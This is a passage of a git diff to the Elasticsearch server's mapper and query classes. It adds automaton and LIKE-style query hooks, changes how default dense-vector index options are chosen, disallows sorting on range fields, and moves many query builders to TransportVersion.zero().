a/server/src/main/java/org/elasticsearch/index/mapper/MappedFieldType.java b/server/src/main/java/org/elasticsearch/index/mapper/MappedFieldType.java index a9e67be4085dd..87877f926983e 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/MappedFieldType.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/MappedFieldType.java @@ -25,6 +25,8 @@ import org.apache.lucene.search.Query; import org.apache.lucene.search.TermQuery; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.automaton.Automaton; +import org.apache.lucene.util.automaton.CharacterRunAutomaton; import org.elasticsearch.ElasticsearchException; import org.elasticsearch.ElasticsearchParseException; import org.elasticsearch.cluster.metadata.IndexMetadata; @@ -54,6 +56,7 @@ import java.util.Objects; import java.util.Set; import java.util.function.Function; +import java.util.function.Supplier; import static org.elasticsearch.search.SearchService.ALLOW_EXPENSIVE_QUERIES; @@ -329,6 +332,19 @@ public final Query wildcardQuery(String value, @Nullable MultiTermQuery.RewriteM return wildcardQuery(value, method, false, context); } + /** + * Similar to wildcardQuery, except that for ESQL the behavior is that of a string LIKE query, + * where the value is matched as a string. + */ + public Query wildcardLikeQuery( + String value, + @Nullable MultiTermQuery.RewriteMethod method, + boolean caseInsensitive, + SearchExecutionContext context + ) { + return wildcardQuery(value, method, caseInsensitive, context); + } + public Query wildcardQuery( String value, @Nullable MultiTermQuery.RewriteMethod method, @@ -370,6 +386,23 @@ public Query regexpQuery( ); } + /** + * Returns a Lucene-pushable Query for the current field. + * For now this can only be an AutomatonQuery, a MatchAllDocsQuery, or a MatchNoDocsQuery. + */ + public Query automatonQuery( + Supplier automatonSupplier, + Supplier characterRunAutomatonSupplier, + @Nullable MultiTermQuery.RewriteMethod method, + SearchExecutionContext context, + String description + ) { + throw new QueryShardException( + context, + "Can only use automaton queries on keyword fields - not on [" + name + "] which is of type [" + typeName() + "]" + ); + } + public Query existsQuery(SearchExecutionContext context) { if (hasDocValues() || getTextSearchInfo().hasNorms()) { return new FieldExistsQuery(name()); diff --git a/server/src/main/java/org/elasticsearch/index/mapper/MapperFeatures.java b/server/src/main/java/org/elasticsearch/index/mapper/MapperFeatures.java index 8817acf3b8e64..0c6a3dbd00e6e 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/MapperFeatures.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/MapperFeatures.java @@ -45,6 +45,7 @@ public class MapperFeatures implements FeatureSpecification { static final NodeFeature IVF_FORMAT_CLUSTER_FEATURE = new NodeFeature("mapper.ivf_format_cluster_feature"); static final NodeFeature IVF_NESTED_SUPPORT = new NodeFeature("mapper.ivf_nested_support"); static final NodeFeature SEARCH_LOAD_PER_SHARD = new NodeFeature("mapper.search_load_per_shard"); + static final NodeFeature PATTERNED_TEXT = new NodeFeature("mapper.patterned_text"); @Override public Set getTestFeatures() { @@ -76,7 +77,8 @@ public Set getTestFeatures() { IVF_FORMAT_CLUSTER_FEATURE, IVF_NESTED_SUPPORT, SEARCH_LOAD_PER_SHARD, - SPARSE_VECTOR_INDEX_OPTIONS_FEATURE + SPARSE_VECTOR_INDEX_OPTIONS_FEATURE, + PATTERNED_TEXT ); } } diff --git a/server/src/main/java/org/elasticsearch/index/mapper/NestedValueFetcher.java
b/server/src/main/java/org/elasticsearch/index/mapper/NestedValueFetcher.java index df9e348dc9fbc..008bbdbd0005b 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/NestedValueFetcher.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/NestedValueFetcher.java @@ -42,7 +42,7 @@ public NestedValueFetcher(String nestedField, FieldFetcher nestedFieldFetcher) { @Override public List fetchValues(Source source, int doc, List includedValues) throws IOException { - List nestedEntriesToReturn = new ArrayList<>(); + ArrayList nestedEntriesToReturn = new ArrayList<>(); Map filteredSource = new HashMap<>(); Map stub = createSourceMapStub(filteredSource); List nestedValues = XContentMapValues.extractNestedSources(nestedFieldPath, source.source()); @@ -69,6 +69,7 @@ public List fetchValues(Source source, int doc, List includedVal nestedEntriesToReturn.add(nestedEntry); } } + nestedEntriesToReturn.trimToSize(); return nestedEntriesToReturn; } diff --git a/server/src/main/java/org/elasticsearch/index/mapper/RangeFieldMapper.java b/server/src/main/java/org/elasticsearch/index/mapper/RangeFieldMapper.java index 79a0e6b1fdbc4..e53fc3cba5d58 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/RangeFieldMapper.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/RangeFieldMapper.java @@ -10,6 +10,7 @@ package org.elasticsearch.index.mapper; import org.apache.lucene.search.Query; +import org.apache.lucene.search.SortField; import org.apache.lucene.util.BytesRef; import org.elasticsearch.ElasticsearchException; import org.elasticsearch.common.Explicit; @@ -20,13 +21,17 @@ import org.elasticsearch.common.time.DateFormatter; import org.elasticsearch.common.time.DateMathParser; import org.elasticsearch.common.util.LocaleUtils; +import org.elasticsearch.core.Nullable; import org.elasticsearch.core.Tuple; import org.elasticsearch.features.NodeFeature; import org.elasticsearch.index.fielddata.FieldDataContext; import org.elasticsearch.index.fielddata.IndexFieldData; +import org.elasticsearch.index.fielddata.IndexFieldDataCache; import org.elasticsearch.index.fielddata.plain.BinaryIndexFieldData; import org.elasticsearch.index.query.SearchExecutionContext; +import org.elasticsearch.indices.breaker.CircuitBreakerService; import org.elasticsearch.search.DocValueFormat; +import org.elasticsearch.search.MultiValueMode; import org.elasticsearch.search.aggregations.support.CoreValuesSourceType; import org.elasticsearch.xcontent.XContentBuilder; import org.elasticsearch.xcontent.XContentParser; @@ -227,7 +232,22 @@ public RangeType rangeType() { @Override public IndexFieldData.Builder fielddataBuilder(FieldDataContext fieldDataContext) { failIfNoDocValues(); - return new BinaryIndexFieldData.Builder(name(), CoreValuesSourceType.RANGE); + return new BinaryIndexFieldData.Builder(name(), CoreValuesSourceType.RANGE) { + @Override + public BinaryIndexFieldData build(IndexFieldDataCache cache, CircuitBreakerService breakerService) { + return new BinaryIndexFieldData(name(), CoreValuesSourceType.RANGE) { + @Override + public SortField sortField( + @Nullable Object missingValue, + MultiValueMode sortMode, + XFieldComparatorSource.Nested nested, + boolean reverse + ) { + throw new IllegalArgumentException("Sorting by range field [" + name() + "] is not supported"); + } + }; + } + }; } @Override diff --git a/server/src/main/java/org/elasticsearch/index/mapper/SourceValueFetcher.java b/server/src/main/java/org/elasticsearch/index/mapper/SourceValueFetcher.java index 
a65a3cd017954..7d1e722200ba3 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/SourceValueFetcher.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/SourceValueFetcher.java @@ -55,7 +55,7 @@ public SourceValueFetcher(Set sourcePaths, Object nullValue) { @Override public List fetchValues(Source source, int doc, List ignoredValues) { - List values = new ArrayList<>(); + ArrayList values = new ArrayList<>(); for (String path : sourcePaths) { Object sourceValue = source.extractValue(path, nullValue); if (sourceValue == null) { @@ -92,6 +92,7 @@ public List fetchValues(Source source, int doc, List ignoredValu } } } + values.trimToSize(); return values; } diff --git a/server/src/main/java/org/elasticsearch/index/mapper/flattened/FlattenedFieldSyntheticWriterHelper.java b/server/src/main/java/org/elasticsearch/index/mapper/flattened/FlattenedFieldSyntheticWriterHelper.java index 0cbddf3044c75..5493bcddb4a84 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/flattened/FlattenedFieldSyntheticWriterHelper.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/flattened/FlattenedFieldSyntheticWriterHelper.java @@ -116,7 +116,9 @@ private KeyValue(final String value, final Prefix prefix, final String leaf) { KeyValue(final BytesRef keyValue) { this( - FlattenedFieldParser.extractKey(keyValue).utf8ToString().split(PATH_SEPARATOR_PATTERN), + // Splitting with a negative limit includes trailing empty strings. + // This is needed in case the provided path has trailing path separators, + // e.g. "a.b.".split(pattern, -1) yields ["a", "b", ""] rather than ["a", "b"]. + FlattenedFieldParser.extractKey(keyValue).utf8ToString().split(PATH_SEPARATOR_PATTERN, -1), FlattenedFieldParser.extractValue(keyValue).utf8ToString() ); } diff --git a/server/src/main/java/org/elasticsearch/index/mapper/vectors/DenseVectorFieldMapper.java b/server/src/main/java/org/elasticsearch/index/mapper/vectors/DenseVectorFieldMapper.java index 329e426be7f47..1189d7c2b28e3 100644 --- a/server/src/main/java/org/elasticsearch/index/mapper/vectors/DenseVectorFieldMapper.java +++ b/server/src/main/java/org/elasticsearch/index/mapper/vectors/DenseVectorFieldMapper.java @@ -31,6 +31,7 @@ import org.apache.lucene.index.VectorEncoding; import org.apache.lucene.index.VectorSimilarityFunction; import org.apache.lucene.search.FieldExistsQuery; +import org.apache.lucene.search.MatchNoDocsQuery; import org.apache.lucene.search.Query; import org.apache.lucene.search.join.BitSetProducer; import org.apache.lucene.search.knn.KnnSearchStrategy; @@ -327,7 +328,9 @@ public Builder(String name, IndexVersion indexVersionCreated) { || previous.updatableTo(current) ); if (defaultInt8Hnsw || defaultBBQ8Hnsw) { - this.indexOptions.alwaysSerialize(); + if (defaultBBQ8Hnsw == false || (dims != null && dims.isConfigured())) { + this.indexOptions.alwaysSerialize(); + } } this.indexed.addValidator(v -> { if (v) { @@ -350,21 +353,31 @@ public Builder(String name, IndexVersion indexVersionCreated) { } private DenseVectorIndexOptions defaultIndexOptions(boolean defaultInt8Hnsw, boolean defaultBBQHnsw) { - if (this.dims != null && this.dims.isConfigured() && elementType.getValue() == ElementType.FLOAT && this.indexed.getValue()) { - if (defaultBBQHnsw && this.dims.getValue() >= BBQ_DIMS_DEFAULT_THRESHOLD) { - return new BBQHnswIndexOptions( - Lucene99HnswVectorsFormat.DEFAULT_MAX_CONN, - Lucene99HnswVectorsFormat.DEFAULT_BEAM_WIDTH, - new RescoreVector(DEFAULT_OVERSAMPLE) - ); - } else if (defaultInt8Hnsw) { - return new Int8HnswIndexOptions( - Lucene99HnswVectorsFormat.DEFAULT_MAX_CONN, -
Lucene99HnswVectorsFormat.DEFAULT_BEAM_WIDTH, - null, - null - ); - } + if (elementType.getValue() != ElementType.FLOAT || indexed.getValue() == false) { + return null; + } + + boolean dimIsConfigured = dims != null && dims.isConfigured(); + if (defaultBBQHnsw && dimIsConfigured == false) { + // Delay selecting the default index options until dimensions are configured. + // This applies only to indices that are eligible to use BBQ as the default, + // since prior to this change, the default was selected eagerly. + return null; + } + + if (defaultBBQHnsw && dimIsConfigured && dims.getValue() >= BBQ_DIMS_DEFAULT_THRESHOLD) { + return new BBQHnswIndexOptions( + Lucene99HnswVectorsFormat.DEFAULT_MAX_CONN, + Lucene99HnswVectorsFormat.DEFAULT_BEAM_WIDTH, + new RescoreVector(DEFAULT_OVERSAMPLE) + ); + } else if (defaultInt8Hnsw) { + return new Int8HnswIndexOptions( + Lucene99HnswVectorsFormat.DEFAULT_MAX_CONN, + Lucene99HnswVectorsFormat.DEFAULT_BEAM_WIDTH, + null, + null + ); } return null; } @@ -2434,6 +2447,9 @@ public Query createKnnQuery( "to perform knn search on field [" + name() + "], its mapping must have [index] set to [true]" ); } + if (dims == null) { + return new MatchNoDocsQuery("No data has been indexed for field [" + name() + "]"); + } KnnSearchStrategy knnSearchStrategy = heuristic.getKnnSearchStrategy(); return switch (getElementType()) { case BYTE -> createKnnByteQuery( @@ -2713,47 +2729,9 @@ public void parse(DocumentParserContext context) throws IOException { } if (fieldType().dims == null) { int dims = fieldType().elementType.parseDimensionCount(context); - ; - final boolean defaultInt8Hnsw = indexCreatedVersion.onOrAfter(IndexVersions.DEFAULT_DENSE_VECTOR_TO_INT8_HNSW); - final boolean defaultBBQ8Hnsw = indexCreatedVersion.onOrAfter(IndexVersions.DEFAULT_DENSE_VECTOR_TO_BBQ_HNSW); - DenseVectorIndexOptions denseVectorIndexOptions = fieldType().indexOptions; - if (denseVectorIndexOptions == null && fieldType().getElementType() == ElementType.FLOAT && fieldType().isIndexed()) { - if (defaultBBQ8Hnsw && dims >= BBQ_DIMS_DEFAULT_THRESHOLD) { - denseVectorIndexOptions = new BBQHnswIndexOptions( - Lucene99HnswVectorsFormat.DEFAULT_MAX_CONN, - Lucene99HnswVectorsFormat.DEFAULT_BEAM_WIDTH, - new RescoreVector(DEFAULT_OVERSAMPLE) - ); - } else if (defaultInt8Hnsw) { - denseVectorIndexOptions = new Int8HnswIndexOptions( - Lucene99HnswVectorsFormat.DEFAULT_MAX_CONN, - Lucene99HnswVectorsFormat.DEFAULT_BEAM_WIDTH, - null, - null - ); - } - } - if (denseVectorIndexOptions != null) { - denseVectorIndexOptions.validateDimension(dims); - } - DenseVectorFieldType updatedDenseVectorFieldType = new DenseVectorFieldType( - fieldType().name(), - indexCreatedVersion, - fieldType().elementType, - dims, - fieldType().indexed, - fieldType().similarity, - denseVectorIndexOptions, - fieldType().meta(), - fieldType().isSyntheticSource - ); - Mapper update = new DenseVectorFieldMapper( - leafName(), - updatedDenseVectorFieldType, - builderParams, - denseVectorIndexOptions, - indexCreatedVersion - ); + DenseVectorFieldMapper.Builder builder = (Builder) getMergeBuilder(); + builder.dimensions(dims); + Mapper update = builder.build(context.createDynamicMapperBuilderContext()); context.addDynamicMapper(update); return; } diff --git a/server/src/main/java/org/elasticsearch/index/query/AutomatonQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/AutomatonQueryBuilder.java deleted file mode 100644 index 9c6331044e6d5..0000000000000 --- 
a/server/src/main/java/org/elasticsearch/index/query/AutomatonQueryBuilder.java +++ /dev/null @@ -1,104 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the "Elastic License - * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side - * Public License v 1"; you may not use this file except in compliance with, at - * your election, the "Elastic License 2.0", the "GNU Affero General Public - * License v3.0 only", or the "Server Side Public License, v 1". - */ - -package org.elasticsearch.index.query; - -import org.apache.lucene.index.Term; -import org.apache.lucene.search.AutomatonQuery; -import org.apache.lucene.search.Query; -import org.apache.lucene.util.automaton.Automaton; -import org.elasticsearch.TransportVersion; -import org.elasticsearch.common.Strings; -import org.elasticsearch.common.io.stream.StreamOutput; -import org.elasticsearch.xcontent.XContentBuilder; - -import java.io.IOException; -import java.io.UnsupportedEncodingException; -import java.util.Objects; - -/** - * Implements an Automaton query, which matches documents based on a Lucene Automaton. - * It does not support serialization or XContent representation. - */ -public class AutomatonQueryBuilder extends AbstractQueryBuilder implements MultiTermQueryBuilder { - private final String fieldName; - private final Automaton automaton; - private final String description; - - public AutomatonQueryBuilder(String fieldName, Automaton automaton, String description) { - if (Strings.isEmpty(fieldName)) { - throw new IllegalArgumentException("field name is null or empty"); - } - if (automaton == null) { - throw new IllegalArgumentException("automaton cannot be null"); - } - this.fieldName = fieldName; - this.automaton = automaton; - this.description = description; - } - - @Override - public String fieldName() { - return fieldName; - } - - @Override - public String getWriteableName() { - throw new UnsupportedOperationException("AutomatonQueryBuilder does not support getWriteableName"); - } - - @Override - protected void doWriteTo(StreamOutput out) throws IOException { - throw new UnsupportedEncodingException("AutomatonQueryBuilder does not support doWriteTo"); - } - - @Override - protected void doXContent(XContentBuilder builder, Params params) throws IOException { - throw new UnsupportedEncodingException("AutomatonQueryBuilder does not support doXContent"); - } - - @Override - protected Query doToQuery(SearchExecutionContext context) throws IOException { - return new AutomatonQueryWithDescription(new Term(fieldName), automaton, description); - } - - @Override - protected int doHashCode() { - return Objects.hash(fieldName, automaton, description); - } - - @Override - protected boolean doEquals(AutomatonQueryBuilder other) { - return Objects.equals(fieldName, other.fieldName) - && Objects.equals(automaton, other.automaton) - && Objects.equals(description, other.description); - } - - @Override - public TransportVersion getMinimalSupportedVersion() { - throw new UnsupportedOperationException("AutomatonQueryBuilder does not support getMinimalSupportedVersion"); - } - - static class AutomatonQueryWithDescription extends AutomatonQuery { - private final String description; - - AutomatonQueryWithDescription(Term term, Automaton automaton, String description) { - super(term, automaton); - this.description = description; - } - - @Override - public String toString(String field) { - if (this.field.equals(field)) { - 
return description; - } - return this.field + ":" + description; - } - } -} diff --git a/server/src/main/java/org/elasticsearch/index/query/AutomatonQueryWithDescription.java b/server/src/main/java/org/elasticsearch/index/query/AutomatonQueryWithDescription.java new file mode 100644 index 0000000000000..78c285470e3b6 --- /dev/null +++ b/server/src/main/java/org/elasticsearch/index/query/AutomatonQueryWithDescription.java @@ -0,0 +1,36 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.index.query; + +import org.apache.lucene.index.Term; +import org.apache.lucene.search.AutomatonQuery; +import org.apache.lucene.util.automaton.Automaton; + +/** + * A specialized {@link AutomatonQuery} that includes a description of the query. + * This can be useful for debugging or logging purposes, providing more context + * about the query being executed. + */ +public class AutomatonQueryWithDescription extends AutomatonQuery { + private final String description; + + public AutomatonQueryWithDescription(Term term, Automaton automaton, String description) { + super(term, automaton); + this.description = description; + } + + @Override + public String toString(String field) { + if (this.field.equals(field)) { + return description; + } + return this.field + ":" + description; + } +} diff --git a/server/src/main/java/org/elasticsearch/index/query/BoolQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/BoolQueryBuilder.java index 5329dbf01975a..1225a070a7c00 100644 --- a/server/src/main/java/org/elasticsearch/index/query/BoolQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/BoolQueryBuilder.java @@ -15,7 +15,6 @@ import org.apache.lucene.search.MatchAllDocsQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -407,7 +406,7 @@ private static boolean rewriteClauses( @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } /** diff --git a/server/src/main/java/org/elasticsearch/index/query/BoostingQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/BoostingQueryBuilder.java index eb5de17165e2d..9e439efd71dc9 100644 --- a/server/src/main/java/org/elasticsearch/index/query/BoostingQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/BoostingQueryBuilder.java @@ -12,7 +12,6 @@ import org.apache.lucene.queries.function.FunctionScoreQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -232,6 +231,6 @@ protected void extractInnerHitBuilders(Map inner @Override public TransportVersion getMinimalSupportedVersion() { - return 
TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/CombinedFieldsQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/CombinedFieldsQueryBuilder.java index c4c18607e6650..5c93d8c85d4f3 100644 --- a/server/src/main/java/org/elasticsearch/index/query/CombinedFieldsQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/CombinedFieldsQueryBuilder.java @@ -23,7 +23,6 @@ import org.apache.lucene.util.BytesRef; import org.apache.lucene.util.QueryBuilder; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.Strings; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -449,6 +448,6 @@ protected boolean doEquals(CombinedFieldsQueryBuilder other) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/ConstantScoreQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/ConstantScoreQueryBuilder.java index faae3c0c424a9..f70f095ecd5ea 100644 --- a/server/src/main/java/org/elasticsearch/index/query/ConstantScoreQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/ConstantScoreQueryBuilder.java @@ -12,7 +12,6 @@ import org.apache.lucene.search.ConstantScoreQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -163,6 +162,6 @@ protected void extractInnerHitBuilders(Map inner @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/CoordinatorRewriteContext.java b/server/src/main/java/org/elasticsearch/index/query/CoordinatorRewriteContext.java index fd1f39a70d525..e0cfd86c10c6d 100644 --- a/server/src/main/java/org/elasticsearch/index/query/CoordinatorRewriteContext.java +++ b/server/src/main/java/org/elasticsearch/index/query/CoordinatorRewriteContext.java @@ -72,6 +72,11 @@ protected boolean matches(String pattern, boolean caseInsensitive, QueryRewriteC return Regex.simpleMatch(pattern, tierPreference); } + @Override + public String getConstantFieldValue(SearchExecutionContext context) { + return context.getTierPreference(); + } + @Override public Query existsQuery(SearchExecutionContext context) { throw new UnsupportedOperationException("field exists query is not supported on the coordinator node"); diff --git a/server/src/main/java/org/elasticsearch/index/query/DisMaxQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/DisMaxQueryBuilder.java index e37b6c89d2be6..4ddb28b76ee6c 100644 --- a/server/src/main/java/org/elasticsearch/index/query/DisMaxQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/DisMaxQueryBuilder.java @@ -12,7 +12,6 @@ import org.apache.lucene.search.DisjunctionMaxQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import 
org.elasticsearch.common.io.stream.StreamOutput; @@ -226,6 +225,6 @@ protected void extractInnerHitBuilders(Map inner @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/DistanceFeatureQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/DistanceFeatureQueryBuilder.java index 919b2852aee43..a89064072f259 100644 --- a/server/src/main/java/org/elasticsearch/index/query/DistanceFeatureQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/DistanceFeatureQueryBuilder.java @@ -11,7 +11,6 @@ import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.geo.GeoPoint; import org.elasticsearch.common.geo.GeoUtils; @@ -201,6 +200,6 @@ public String toString() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/ExistsQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/ExistsQueryBuilder.java index fb96f85835548..3b596ed8b6d4c 100644 --- a/server/src/main/java/org/elasticsearch/index/query/ExistsQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/ExistsQueryBuilder.java @@ -15,7 +15,6 @@ import org.apache.lucene.search.MatchNoDocsQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.Strings; import org.elasticsearch.common.io.stream.StreamInput; @@ -179,6 +178,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/FieldMaskingSpanQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/FieldMaskingSpanQueryBuilder.java index d709ca42a7b9e..cc2a05b8ed2bd 100644 --- a/server/src/main/java/org/elasticsearch/index/query/FieldMaskingSpanQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/FieldMaskingSpanQueryBuilder.java @@ -13,7 +13,6 @@ import org.apache.lucene.queries.spans.SpanQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.Strings; import org.elasticsearch.common.io.stream.StreamInput; @@ -179,6 +178,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/FuzzyQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/FuzzyQueryBuilder.java index ada82b7a37c91..13ebb8e19322e 100644 --- a/server/src/main/java/org/elasticsearch/index/query/FuzzyQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/FuzzyQueryBuilder.java @@ -12,7 +12,6 @@ import org.apache.lucene.search.FuzzyQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import 
org.elasticsearch.common.ParsingException; import org.elasticsearch.common.Strings; import org.elasticsearch.common.io.stream.StreamInput; @@ -300,6 +299,6 @@ protected boolean doEquals(FuzzyQueryBuilder other) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/GeoBoundingBoxQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/GeoBoundingBoxQueryBuilder.java index e91be82730222..254f70aeaeba2 100644 --- a/server/src/main/java/org/elasticsearch/index/query/GeoBoundingBoxQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/GeoBoundingBoxQueryBuilder.java @@ -382,6 +382,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/GeoDistanceQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/GeoDistanceQueryBuilder.java index 14271fb01696a..93e6c0a8bd6b0 100644 --- a/server/src/main/java/org/elasticsearch/index/query/GeoDistanceQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/GeoDistanceQueryBuilder.java @@ -12,7 +12,6 @@ import org.apache.lucene.search.MatchNoDocsQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.Strings; import org.elasticsearch.common.geo.GeoDistance; @@ -385,6 +384,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/GeoPolygonQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/GeoPolygonQueryBuilder.java index 4cddf8f91ab3f..d113d6b9ba82b 100644 --- a/server/src/main/java/org/elasticsearch/index/query/GeoPolygonQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/GeoPolygonQueryBuilder.java @@ -16,7 +16,6 @@ import org.apache.lucene.search.MatchNoDocsQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.Strings; import org.elasticsearch.common.geo.GeoPoint; @@ -319,6 +318,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/GeoShapeQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/GeoShapeQueryBuilder.java index 845023d2d832d..62ae71a8276e8 100644 --- a/server/src/main/java/org/elasticsearch/index/query/GeoShapeQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/GeoShapeQueryBuilder.java @@ -12,7 +12,6 @@ import org.apache.lucene.search.ConstantScoreQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.geo.GeometryParser; import org.elasticsearch.common.geo.ShapeRelation; import org.elasticsearch.common.geo.SpatialStrategy; @@ -268,6 +267,6 @@ public static GeoShapeQueryBuilder 
fromXContent(XContentParser parser) throws IO @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/IdsQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/IdsQueryBuilder.java index bfaeca31730b9..fbb905b702293 100644 --- a/server/src/main/java/org/elasticsearch/index/query/IdsQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/IdsQueryBuilder.java @@ -158,6 +158,6 @@ protected boolean doEquals(IdsQueryBuilder other) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/index/query/IntervalQueryBuilder.java b/server/src/main/java/org/elasticsearch/index/query/IntervalQueryBuilder.java index 0731eef5bfe35..8a62e1d2856b5 100644 --- a/server/src/main/java/org/elasticsearch/index/query/IntervalQueryBuilder.java +++ b/server/src/main/java/org/elasticsearch/index/query/IntervalQueryBuilder.java @@ -13,7 +13,6 @@ import org.apache.lucene.search.MatchNoDocsQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -154,6 +153,6 @@ public String getWriteableName() { @Override public 